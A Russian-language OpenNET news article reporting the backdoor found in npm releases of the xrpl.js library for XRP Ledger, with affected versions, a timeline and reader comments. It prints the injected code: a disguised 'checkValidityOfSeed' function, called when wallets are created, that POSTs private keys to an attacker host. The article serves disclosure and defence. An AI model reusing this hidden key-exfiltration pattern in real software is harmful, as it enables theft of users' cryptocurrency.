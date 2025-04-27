The OpenNET Project / Index page

[ новости /+++ | форум | теги | ]

Злоумышленники смогли внедрить бэкдор в NPM-пакет от разработчиков криптовалюты XPR

27.04.2025 09:40

В NPM-пакете xrpl выявлен вредоносный код (CVE-2025-32965), отправляющий на внешний сервер мастер-ключи от криптокошельков и закрытые ключи криптовалют. Пакет xrpl позиционируется как официально рекомендованная библиотека (xrpl.js) для взаимодействия JavaScript- и TypeScript-приложений, работающих через браузер или Node.js, с децентрализовнной платёжной сетью XRP Ledger (Ripple), развивающей криптовалюту XRP, занимающую 4 место по капитализации (уступает только BTC, ETH и USDT). Библиотека xrpl.js насчитывает 165 тысяч загрузок за предшествующую инциденту неделю, используется в качестве зависимости в 143 NPM-пакетах и задействована во многих криптовалютных приложениях и сайтах.

Вредоносный код присутствовал в выпусках xrpl.js 2.14.2, 4.2.1, 4.2.2, 4.2.3 и 4.2.4, и был удалён в версиях 4.2.5 и 2.14.3. На GitHub вредоносные версии не публиковались и были размещены только в репозитории NPM. Пакеты с вредоносным кодом появились в репозитории NPM 21 апреля в 23:53 (MSK) и были удалены администрацией репозитория 22 апреля в 16:00 (MSK). Подробности разбора инцидента со стороны проекта XRP Ledger пока не опубликованы, но предполагается, что атака была совершена через компрометацию учётной записи сопровождающего, используя методы социального инжиниринга и фишинга.

Проблемные пакеты соответствовали официальному релизу 4.2.0 и отличались от него наличием изменений, осуществлявших отправку на внешний сервер закрытых ключей, используемых в криптокошельках. Изменение было оформлено в виде функции checkValidityOfSeed, преподносимой как функция проверки целостности ключа, а на деле отправлявшей запросы на хост "0x9c.xyz". 


   export function checkValidityOfSeed(seed: string) {
     if (validSeeds.has(seed)) return
     validSeeds.add(seed)
     fetch("https://0x9c[.]xyz/xc", { method: 'POST', headers: { 'ad-referral': seed, } })
   }
   ...

   public constructor(...){
       ...
       this.privateKey = privateKey
       this.classicAddress = opts.masterAddress
         ? ensureClassicAddress(opts.masterAddress)
         : deriveAddress(publicKey)
       this.seed = opts.seed

       checkValidityOfSeed(privateKey)
  }
  ...
  private static deriveWallet(...){
    ...
    const { publicKey, privateKey } = deriveKeypair(seed, {
      algorithm: opts.algorithm ?? DEFAULT_ALGORITHM,
    })

    checkValidityOfSeed(privateKey)

    return new Wallet(publicKey, privateKey, {
      seed,
      masterAddress: opts.masterAddress,
    })
  }

Вредоносный код внедрялся поэтапно. В версии 4.2.1 из package.json были удалены секции настроек "scripts" и "prettier", а также были внесены изменения в файлы build/xrp-latest-min.js и build/xrp-latest.js. В версии 4.2.2 в файл src/Wallet/index.js был добавлен вредоносный код. В версиях 4.2.3 и 4.2.4 были добавлены дополнительные вредоносные изменения, затрагивающие вариант кода на TypeScript.

  1. Главная ссылка к новости (https://www.aikido.dev/blog/xr...)
  2. OpenNews: Компрометация NPM-репозитория Ledger привела к подстановке вредоносных изменений
  3. OpenNews: Уязвимость в NPM-пакете JsonWebToken, насчитывающем 10 млн загрузок в неделю
  4. OpenNews: GitHub раскрыл данные о взломе инфраструктуры NPM и выявлении открытых паролей в логах
  5. OpenNews: В NPM-пакет node-ipc внесено вредоносное изменение, удаляющее файлы на системах в России и Беларуси
  6. OpenNews: Атакующие внедрили вредоносный код в web3.js, официальный JavaScript-клиент для криптовалюты Solana
Лицензия: CC BY 3.0
Короткая ссылка: https://opennet.ru/63145-npm
Ключевые слова: npm, xpr
При перепечатке указание ссылки на opennet.ru обязательно


Обсуждение (3) RSS
  • 2, Аноним (2), 10:10, 27/04/2025 [ответить]  
    		• –2 +/
    Интересно, в теории, если люди потеряли деньги, то в полицию какой страны они должны обращаться?

    В той в которой просиживать сами или где проживает владелец NPM аккаунта?

     
     
  • 3, Аноним (3), 10:16, 27/04/2025 [^] [^^] [^^^] [ответить]  
    		• +/
    в полицию страны, в которой изобрели язык программирования, который не различает pure-функции от impure. Будь яваскрипт таким языком, пользователи бы заметили, что функция, которая должна была быть pure, почему-то изменила сигнатуру и стала требовать какого-то рантайма, способного обрабатывать эффекты вида "обратиться к http-ресурсу".
     

  • 4, Аноним (4), 10:34, 27/04/2025 [ответить]  
    		• +/
    Если вы не можете развернуть локальную ноду на своем железе, то это не крипта, а скам. Все токены в любой момент могут навернуться.
     

     Добавить комментарий
    Имя:
    E-Mail:
    Текст:

    Партнёры:
    PostgresPro
    Inferno Solutions
    Hosting by Hoster.ru
    Хостинг:

    Закладки на сайте
    Проследить за страницей     		Created 1996-2025 by Maxim Chirkov
    Добавить, Поддержать, Вебмастеру